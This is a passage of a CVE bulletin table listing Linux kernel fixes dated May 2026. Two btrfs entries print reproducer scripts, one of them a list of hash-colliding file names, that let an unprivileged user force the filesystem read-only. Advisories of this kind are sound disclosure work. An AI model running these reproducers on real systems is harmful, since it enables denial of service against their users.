https://git.kernel.org/stable/c/6a5dc3ee97581da2907fc7acd62853f07184de67 https://git.kernel.org/stable/c/a16d1ec4dd0cdcf689f324adde6067083bce9099 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: ptp: don't WARN when controlling PF is unavailable In VFIO passthrough setups, it is possible to pass through only a PF which doesn't own the source timer. In that case the PTP controlling PF (adapter->ctrl_pf) is never initialized in the VM, so ice_get_ctrl_ptp() returns NULL and triggers WARN_ON() in ice_ptp_setup_pf(). Since this is an expected behavior in that configuration, replace WARN_ON() with an informational message and return -EOPNOTSUPP. | 2026-05-08 | not yet calculated | CVE-2026-43346 | https://git.kernel.org/stable/c/e19675b384e9dcaca1bd5e4a67b8ad136eccfbe8 https://git.kernel.org/stable/c/c73f365707d3b1b78b7d16e1f029020d1ae50d0f https://git.kernel.org/stable/c/bb3f21edc7056cdf44a7f7bd7ba65af40741838c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mshv_vtl: Fix vmemmap_shift exceeding MAX_FOLIO_ORDER When registering VTL0 memory via MSHV_ADD_VTL0_MEMORY, the kernel computes pgmap->vmemmap_shift as the number of trailing zeros in the OR of start_pfn and last_pfn, intending to use the largest compound page order both endpoints are aligned to. However, this value is not clamped to MAX_FOLIO_ORDER, so a sufficiently aligned range (e.g. physical range [0x800000000000, 0x800080000000), corresponding to start_pfn=0x800000000 with 35 trailing zeros) can produce a shift larger than what memremap_pages() accepts, triggering a WARN and returning -EINVAL: WARNING: ... memremap_pages+0x512/0x650 requested folio size unsupported The MAX_FOLIO_ORDER check was added by commit 646b67d57589 ("mm/memremap: reject unreasonable folio/compound page sizes in memremap_pages()"). Fix this by clamping vmemmap_shift to MAX_FOLIO_ORDER so we always request the largest order the kernel supports, in those cases, rather than an out-of-range value. Also fix the error path to propagate the actual error code from devm_memremap_pages() instead of hard-coding -EFAULT, which was masking the real -EINVAL return. | 2026-05-08 | not yet calculated | CVE-2026-43348 | https://git.kernel.org/stable/c/a142ca4b6481e71498712800b20e0c0fcf02843b https://git.kernel.org/stable/c/404cd6bffe17e25e0f94ed2775ffdd6cd10ac3fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid uninit-value access in f2fs_sanity_check_node_footer syzbot reported a f2fs bug as below: BUG: KMSAN: uninit-value in f2fs_sanity_check_node_footer+0x374/0xa20 fs/f2fs/node.c:1520 f2fs_sanity_check_node_footer+0x374/0xa20 fs/f2fs/node.c:1520 f2fs_finish_read_bio+0xe1e/0x1d60 fs/f2fs/data.c:177 f2fs_read_end_io+0x6ab/0x2220 fs/f2fs/data.c:-1 bio_endio+0x1006/0x1160 block/bio.c:1792 submit_bio_noacct+0x533/0x2960 block/blk-core.c:891 submit_bio+0x57a/0x620 block/blk-core.c:926 blk_crypto_submit_bio include/linux/blk-crypto.h:203 [inline] f2fs_submit_read_bio+0x12c/0x360 fs/f2fs/data.c:557 f2fs_submit_page_bio+0xee2/0x1450 fs/f2fs/data.c:775 read_node_folio+0x384/0x4b0 fs/f2fs/node.c:1481 __get_node_folio+0x5db/0x15d0 fs/f2fs/node.c:1576 f2fs_get_inode_folio+0x40/0x50 fs/f2fs/node.c:1623 do_read_inode fs/f2fs/inode.c:425 [inline] f2fs_iget+0x1209/0x9380 fs/f2fs/inode.c:596 f2fs_fill_super+0x8f5a/0xb2e0 fs/f2fs/super.c:5184 get_tree_bdev_flags+0x6e6/0x920 fs/super.c:1694 get_tree_bdev+0x38/0x50 fs/super.c:1717 f2fs_get_tree+0x35/0x40 fs/f2fs/super.c:5436 vfs_get_tree+0xb3/0x5d0 fs/super.c:1754 fc_mount fs/namespace.c:1193 [inline] do_new_mount_fc fs/namespace.c:3763 [inline] do_new_mount+0x885/0x1dd0 fs/namespace.c:3839 path_mount+0x7a2/0x20b0 fs/namespace.c:4159 do_mount fs/namespace.c:4172 [inline] __do_sys_mount fs/namespace.c:4361 [inline] __se_sys_mount+0x704/0x7f0 fs/namespace.c:4338 __x64_sys_mount+0xe4/0x150 fs/namespace.c:4338 x64_sys_call+0x39f0/0x3ea0 arch/x86/include/generated/asm/syscalls_64.h:166 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x134/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The root cause is: in f2fs_finish_read_bio(), we may access uninit data in folio if we failed to read the data from device into folio, let's add a check condition to avoid such issue. | 2026-05-08 | not yet calculated | CVE-2026-43349 | https://git.kernel.org/stable/c/59970b2586fef4b13e96527b9d232bed30b640cd https://git.kernel.org/stable/c/a10b89343d41ceee1af0ec38d3a74e526c77fa09 https://git.kernel.org/stable/c/7b9161a605e91d0987e2596a245dc1f21621b23f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Eagerly init vgic dist/redist on vgic creation If vgic_allocate_private_irqs_locked() fails for any odd reason, we exit kvm_vgic_create() early, leaving dist->rd_regions uninitialised. kvm_vgic_dist_destroy() then comes along and walks into the weeds trying to free the RDs. Got to love this stuff. Solve it by moving all the static initialisation early, and make sure that if we fail halfway, we're in a reasonable shape to perform the rest of the teardown. While at it, reset the vgic model on failure, just in case... | 2026-05-08 | not yet calculated | CVE-2026-43351 | https://git.kernel.org/stable/c/b7493f48c3dba75674a4ee505b4afa8fe5102457 https://git.kernel.org/stable/c/a24f1d80fbcdbf8b2a7044a00fa12b3972b4c31c https://git.kernel.org/stable/c/ac6769c8f948dff33265c50e524aebf9aa6f1be0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: proximity: hx9023s: Protect against division by zero in set_samp_freq Avoid division by zero when sampling frequency is unspecified. | 2026-05-08 | not yet calculated | CVE-2026-43354 | https://git.kernel.org/stable/c/451ec5e67444f8460f9706a1bde146b5bbc86ce6 https://git.kernel.org/stable/c/ad9da7d39cecd3e92f54149ea0ebca390f33fe69 https://git.kernel.org/stable/c/739fdfe65678d8e5dcf59496c56b32ab3ba3dbaa https://git.kernel.org/stable/c/a318cfc0853706f1d6ce682dba660bc455d674ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: light: bh1780: fix PM runtime leak on error path Move pm_runtime_put_autosuspend() before the error check to ensure the PM runtime reference count is always decremented after pm_runtime_get_sync(), regardless of whether the read operation succeeds or fails. | 2026-05-08 | not yet calculated | CVE-2026-43355 | https://git.kernel.org/stable/c/1eb3af4f59e09323788860a9155e9766b12891e5 https://git.kernel.org/stable/c/424bf90e87134effe4bd932608a15286493b11ab https://git.kernel.org/stable/c/fc77e0a5600e620a2ae51ec78933162fb217b20b https://git.kernel.org/stable/c/aae572ddc28578af476cce7da3faec0395ef0bf0 https://git.kernel.org/stable/c/33661bfc85c14836bfef4425a74b0ca2df4bb5ad https://git.kernel.org/stable/c/dd72e6c3cdea05cad24e99710939086f7a113fb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: imu: adis: Fix NULL pointer dereference in adis_init The adis_init() function dereferences adis->ops to check if the individual function pointers (write, read, reset) are NULL, but does not first check if adis->ops itself is NULL. Drivers like adis16480, adis16490, adis16545 and others do not set custom ops and rely on adis_init() assigning the defaults. Since struct adis is zero-initialized by devm_iio_device_alloc(), adis->ops is NULL when adis_init() is called, causing a NULL pointer dereference: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 pc : adis_init+0xc0/0x118 Call trace: adis_init+0xc0/0x118 adis16480_probe+0xe0/0x670 Fix this by checking if adis->ops is NULL before dereferencing it, falling through to assign the default ops in that case. | 2026-05-08 | not yet calculated | CVE-2026-43356 | https://git.kernel.org/stable/c/ba19dd366528b961430f5195c2e382420703074f https://git.kernel.org/stable/c/1a48f94c63a078e7b6a2e59a637fc0858dc6510c https://git.kernel.org/stable/c/9990cd4f8827bd1ae3fb6eb7407630d8d463c430 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: gyro: mpu3050-core: fix pm_runtime error handling The return value of pm_runtime_get_sync() is not checked, allowing the driver to access hardware that may fail to resume. The device usage count is also unconditionally incremented. Use pm_runtime_resume_and_get() which propagates errors and avoids incrementing the usage count on failure. In preenable, add pm_runtime_put_autosuspend() on set_8khz_samplerate() failure since postdisable does not run when preenable fails. | 2026-05-08 | not yet calculated | CVE-2026-43357 | https://git.kernel.org/stable/c/935f57dd43492240e1ca220dd065d624efece6be https://git.kernel.org/stable/c/8544c488e50206f00630a8bbba43d2c8bd290345 https://git.kernel.org/stable/c/35f54e7bcb1eccdc6e5bff06580eeef2e0ff3677 https://git.kernel.org/stable/c/2a86a396aa001a9f9ba2d37dda36573a76f17c90 https://git.kernel.org/stable/c/66c0d1d600e7be034959cf49edab104cb5a39258 https://git.kernel.org/stable/c/42685cf96e28262e0b84d74447f3d99f3f6a72e0 https://git.kernel.org/stable/c/7a3dec5b265cf87678b10c98a72a435a8e769bb7 https://git.kernel.org/stable/c/acc3949aab3e8094641a9c7c2768de1958c88378 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: add missing RCU unlock in error path in try_release_subpage_extent_buffer() Call rcu_read_lock() before exiting the loop in try_release_subpage_extent_buffer() because there is a rcu_read_unlock() call past the loop. This has been detected by the Clang thread-safety analyzer. | 2026-05-08 | not yet calculated | CVE-2026-43358 | https://git.kernel.org/stable/c/5e1ab71f74a1e61f1254dff128a764fdebaec0b8 https://git.kernel.org/stable/c/35b0c8768e848e1b7e32052db36b5fa59b6a33a1 https://git.kernel.org/stable/c/b2840e33127ce0eea880504b7f133e780f567a9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort on set received ioctl due to item overflow If the set received ioctl fails due to an item overflow when attempting to add the BTRFS_UUID_KEY_RECEIVED_SUBVOL we have to abort the transaction since we did some metadata updates before. This means that if a user calls this ioctl with the same received UUID field for a lot of subvolumes, we will hit the overflow, trigger the transaction abort and turn the filesystem into RO mode. A malicious user could exploit this, and this ioctl does not even requires that a user has admin privileges (CAP_SYS_ADMIN), only that he/she owns the subvolume. Fix this by doing an early check for item overflow before starting a transaction. This is also race safe because we are holding the subvol_sem semaphore in exclusive (write) mode. A test case for fstests will follow soon. | 2026-05-08 | not yet calculated | CVE-2026-43359 | https://git.kernel.org/stable/c/b9914db13ac15aca3b74544c0bb1a2e0dad1f174 https://git.kernel.org/stable/c/b19c0465e4daad5aa8f60552ea0578cf31a11b1e https://git.kernel.org/stable/c/2e57b8cac2ba0d38aac76c1ecdfd8b899e3581a5 https://git.kernel.org/stable/c/d11aefe654a04fc41996d254748d6a38b6b0a7be https://git.kernel.org/stable/c/41fb97353ff58fa4f31904c343fc8e3df2f7517d https://git.kernel.org/stable/c/87f2c46003fce4d739138aab4af1942b1afdadac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort on file creation due to name hash collision If we attempt to create several files with names that result in the same hash, we have to pack them in same dir item and that has a limit inherent to the leaf size. However if we reach that limit, we trigger a transaction abort and turns the filesystem into RO mode. This allows for a malicious user to disrupt a system, without the need to have administration privileges/capabilities. Reproducer: $ cat exploit-hash-collisions.sh #!/bin/bash DEV=/dev/sdi MNT=/mnt/sdi # Use smallest node size to make the test faster and require fewer file # names that result in hash collision. mkfs.btrfs -f --nodesize 4K $DEV mount $DEV $MNT # List of names that result in the same crc32c hash for btrfs. declare -a names=( 'foobar' '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC' 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z' 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4' 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:' 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO' 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us' 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY' 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO' 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU' 'Ono7avN5GjC:_6dBJ_' 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am' 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k' 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2' 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd' 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm' 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ' 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky' 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS' 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz' 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu' 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN' 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4=' 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn' 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C' 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW' '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc' 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mC ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43360 | https://git.kernel.org/stable/c/36947b5200b89bbe3a63629c12d4b31c84c0af9f https://git.kernel.org/stable/c/64ad49597d14c495ab8b7933bfefc83936a598e4 https://git.kernel.org/stable/c/5e2ea10b800d1bbb95e0c01a83f4f8119ac5d688 https://git.kernel.org/stable/c/9273175bf16c83f3ec93aa242d78c9b5db452d4d https://git.kernel.org/stable/c/0625e564290450c1921b115fc3d9abef74e055bd https://git.kernel.org/stable/c/2d1ababdedd4ba38867c2500eb7f95af5ddeeef7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort when snapshotting received subvolumes Currently a user can trigger a transaction abort by snapshotting a previously received snapshot a bunch of times until we reach a BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we can store in a leaf). This is very likely not common in practice, but if it happens, it turns the filesystem into RO mode. The snapshot, send and set_received_subvol and subvol_setflags (used by receive) don't require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user could use this to turn a filesystem into RO mode and disrupt a system. Reproducer script: $ cat test.sh #!/bin/bash DEV=/dev/sdi MNT=/mnt/sdi # Use smallest node size to make the test faster. mkfs.btrfs -f --nodesize 4K $DEV mount $DEV $MNT # Create a subvolume and set it to RO so that it can be used for send. btrfs subvolume create $MNT/sv touch $MNT/sv/foo btrfs property set $MNT/sv ro true # Send and receive the subvolume into snaps/sv. mkdir $MNT/snaps btrfs send $MNT/sv | btrfs receive $MNT/snaps # Now snapshot the received subvolume, which has a received_uuid, a # lot of times to trigger the leaf overflow. total=500 for ((i = 1; i <= $total; i++)); do echo -ne "\rCreating snapshot $i/$total" btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null done echo umount $MNT When running the test: $ ./test.sh (...) Create subvolume '/mnt/sdi/sv' At subvol /mnt/sdi/sv At subvol sv Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system And in dmesg/syslog: $ dmesg (...) [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252! [251067.629212] ------------[ cut here ]------------ [251067.630033] BTRFS: Transaction aborted (error -75) [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235 [251067.632851] Modules linked in: btrfs dm_zero (...) [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full) [251067.646165] Tainted: [W]=WARN [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs] [251067.649984] Code: f0 48 0f (...) [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292 [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3 [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750 [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820 [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0 [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5 [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000 [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0 [251067.661972] Call Trace: [251067.662292] <TASK> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs] [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs] [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs] [251067.665238] ? _raw_spin_unlock+0x15/0x30 [251067.665837] ? record_root_ ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43361 | https://git.kernel.org/stable/c/9a9227b488ffb7cdbb5d930a01fc6956c05ba61a https://git.kernel.org/stable/c/6bce705b699cba9afccb996c77d194fe003dfa2a https://git.kernel.org/stable/c/e3d8efc157bc590457d3e31da403af1a221643d6 https://git.kernel.org/stable/c/bac55dde8efa457e769c934fd88a63f2141ba238 https://git.kernel.org/stable/c/770af8e465c2c3de528f85e840eab462dd41542b https://git.kernel.org/stable/c/e1b18b959025e6b5dbad668f391f65d34b39595a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/apic: Disable x2apic on resume if the kernel expects so When resuming from s2ram, firmware may re-enable x2apic mode, which may have been disabled by the kernel during boot either because it doesn't support IRQ remapping or for other reasons. This causes the kernel to continue using the xapic interface, while the hardware is in x2apic mode, which causes hangs. This happens on defconfig + bare metal + s2ram. Fix this in lapic_resume() by disabling x2apic if the kernel expects it to be disabled, i.e. when x2apic_mode = 0. The ACPI v6.6 spec, Section 16.3 [1] says firmware restores either the pre-sleep configuration or initial boot configuration for each CPU, including MSR state: When executing from the power-on reset vector as a result of waking from an S2 or S3 sleep state, the platform firmware performs only the hardware initialization required to restore the system to either the state the platform was in prior to the initial operating system boot, or to the pre-sleep configuration state. In multiprocessor systems, non-boot processors should be placed in the same state as prior to the initial operating system boot. (further ahead) If this is an S2 or S3 wake, then the platform runtime firmware restores minimum context of the system before jumping to the waking vector. This includes: CPU configuration. Platform runtime firmware restores the pre-sleep configuration or initial boot configuration of each CPU (MSR, MTRR, firmware update, SMBase, and so on). Interrupts must be disabled (for IA-32 processors, disabled by CLI instruction). (and other things) So at least as per the spec, re-enablement of x2apic by the firmware is allowed if "x2apic on" is a part of the initial boot configuration. [1] https://uefi.org/specs/ACPI/6.6/16_Waking_and_Sleeping.html#initialization [ bp: Massage. ] | 2026-05-08 | not yet calculated | CVE-2026-43363 | https://git.kernel.org/stable/c/a6ad6f2e31b524cbb66b2f370bad0cf17d327e6c https://git.kernel.org/stable/c/3dd0812a7c764cd8f3b0182441ac22da0a7f3b09 https://git.kernel.org/stable/c/965289b120cc68cca886c75219c68b8c15751d73 https://git.kernel.org/stable/c/f591938072115bf08730b8530c67fab189cc6308 https://git.kernel.org/stable/c/1a85f84214f9d790216547ac6086bf8033cd9e5a https://git.kernel.org/stable/c/11712c4eb384098db4cb08792e223c818b908c1a https://git.kernel.org/stable/c/1d8440c1e7c49715f937416ac90cf260f1f1712c https://git.kernel.org/stable/c/8cc7dd77a1466f0ec58c03478b2e735a5b289b96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: fix NULL pointer dereference in ublk_ctrl_set_size() ublk_ctrl_set_size() unconditionally dereferences ub->ub_disk via set_capacity_and_notify() without checking if it is NULL. ub->ub_disk is NULL before UBLK_CMD_START_DEV completes (it is only assigned in ublk_ctrl_start_dev()) and after UBLK_CMD_STOP_DEV runs (ublk_detach_disk() sets it to NULL). Since the UBLK_CMD_UPDATE_SIZE handler performs no state validation, a user can trigger a NULL pointer dereference by sending UPDATE_SIZE to a device that has been added but not yet started, or one that has been stopped. Fix this by checking ub->ub_disk under ub->mutex before dereferencing it, and returning -ENODEV if the disk is not available. | 2026-05-08 | not yet calculated | CVE-2026-43364 | https://git.kernel.org/stable/c/f13fe6794726755a43090cb680c4c58cea6aa5f1 https://git.kernel.org/stable/c/c28d945bfa92e15147e93b73f95345b9bec979b0 https://git.kernel.org/stable/c/25966fc097691e5c925ad080f64a2f19c5fd940a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd: Fix a few more NULL pointer dereference in device cleanup I found a few more paths that cleanup fails due to a NULL version pointer on unsupported hardware. Add NULL checks as applicable. (cherry picked from commit f5a05f8414fc10f307eb965f303580c7778f8dd2) | 2026-05-08 | not yet calculated | CVE-2026-43367 | https://git.kernel.org/stable/c/38f1640db7f8bf57b9e09c5b0b8b205a598f1b3e https://git.kernel.org/stable/c/5edcb0d6729b88f192ec8b0896aaf581e3593c9c https://git.kernel.org/stable/c/72ecb1dae72775fa9fea0159d8445d620a0a2295 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd: Fix NULL pointer dereference in device cleanup When GPU initialization fails due to an unsupported HW block IP blocks may have a NULL version pointer. During cleanup in amdgpu_device_fini_hw, the code calls amdgpu_device_set_pg_state and amdgpu_device_set_cg_state which iterate over all IP blocks and access adev->ip_blocks[i].version without NULL checks, leading to a kernel NULL pointer dereference. Add NULL checks for adev->ip_blocks[i].version in both amdgpu_device_set_cg_state and amdgpu_device_set_pg_state to prevent dereferencing NULL pointers during GPU teardown when initialization has failed. (cherry picked from commit b7ac77468cda92eecae560b05f62f997a12fe2f2) | 2026-05-08 | not yet calculated | CVE-2026-43369 | https://git.kernel.org/stable/c/43025c941aced9a9009f9ff20eea4eb78c61deb8 https://git.kernel.org/stable/c/767cd24d3c4ae847688877def4891943f6611ecd https://git.kernel.org/stable/c/062ea905fff7756b2e87143ffccaece5cdb44267 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: macb: Shuffle the tx ring before enabling tx Quanyang observed that when using an NFS rootfs on an AMD ZynqMp board, the rootfs may take an extended time to recover after a suspend. Upon investigation, it was determined that the issue originates from a problem in the macb driver. According to the Zynq UltraScale TRM [1], when transmit is disabled, the transmit buffer queue pointer resets to point to the address specified by the transmit buffer queue base address register. In the current implementation, the code merely resets `queue->tx_head` and `queue->tx_tail` to '0'. This approach presents several issues: - Packets already queued in the tx ring are silently lost, leading to memory leaks since the associated skbs cannot be released. - Concurrent write access to `queue->tx_head` and `queue->tx_tail` may occur from `macb_tx_poll()` or `macb_start_xmit()` when these values are reset to '0'. - The transmission may become stuck on a packet that has already been sent out, with its 'TX_USED' bit set, but has not yet been processed. However, due to the manipulation of 'queue->tx_head' and 'queue->tx_tail', `macb_tx_poll()` incorrectly assumes there are no packets to handle because `queue->tx_head == queue->tx_tail`. This issue is only resolved when a new packet is placed at this position. This is the root cause of the prolonged recovery time observed for the NFS root filesystem. To resolve this issue, shuffle the tx ring and tx skb array so that the first unsent packet is positioned at the start of the tx ring. Additionally, ensure that updates to `queue->tx_head` and `queue->tx_tail` are properly protected with the appropriate lock. [1] https://docs.amd.com/v/u/en-US/ug1085-zynq-ultrascale-trm | 2026-05-08 | not yet calculated | CVE-2026-43371 | https://git.kernel.org/stable/c/c6783bfa31a59f34fe4feb1bdbf67791ef3fb0b7 https://git.kernel.org/stable/c/0a47c3889fcd843c72aa57fa8c4d06f5801fced4 https://git.kernel.org/stable/c/88f974fe118cb4653f029929ecbca7cfe06132ae https://git.kernel.org/stable/c/58f5d34f88e8f00910b692537f7b2efdb8c3705d https://git.kernel.org/stable/c/403182e0771b250cfde0fe7e1081d095ceaf8230 https://git.kernel.org/stable/c/881a0263d502e1a93ebc13a78254e9ad19520232 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: microchip: Fix error path in PTP IRQ setup If request_threaded_irq() fails during the PTP message IRQ setup, the newly created IRQ mapping is never disposed. Indeed, the ksz_ptp_irq_setup()'s error path only frees the mappings that were successfully set up. Dispose the newly created mapping if the associated request_threaded_irq() fails at setup. | 2026-05-08 | not yet calculated | CVE-2026-43372 | https://git.kernel.org/stable/c/3704ac6a0d9a78f66a187515a8ca3faedaf01cc5 https://git.kernel.org/stable/c/e80fef36c676c947072dabeb5803ae59d92ba493 https://git.kernel.org/stable/c/6c58a9fdb0d0e1011aa02455d26d6ebea251979b https://git.kernel.org/stable/c/c2d1d41e0e8ec447d40a5752844fc5fb0b23db27 https://git.kernel.org/stable/c/99c8c16a4aad0b37293cae213e15957c573cf79b |
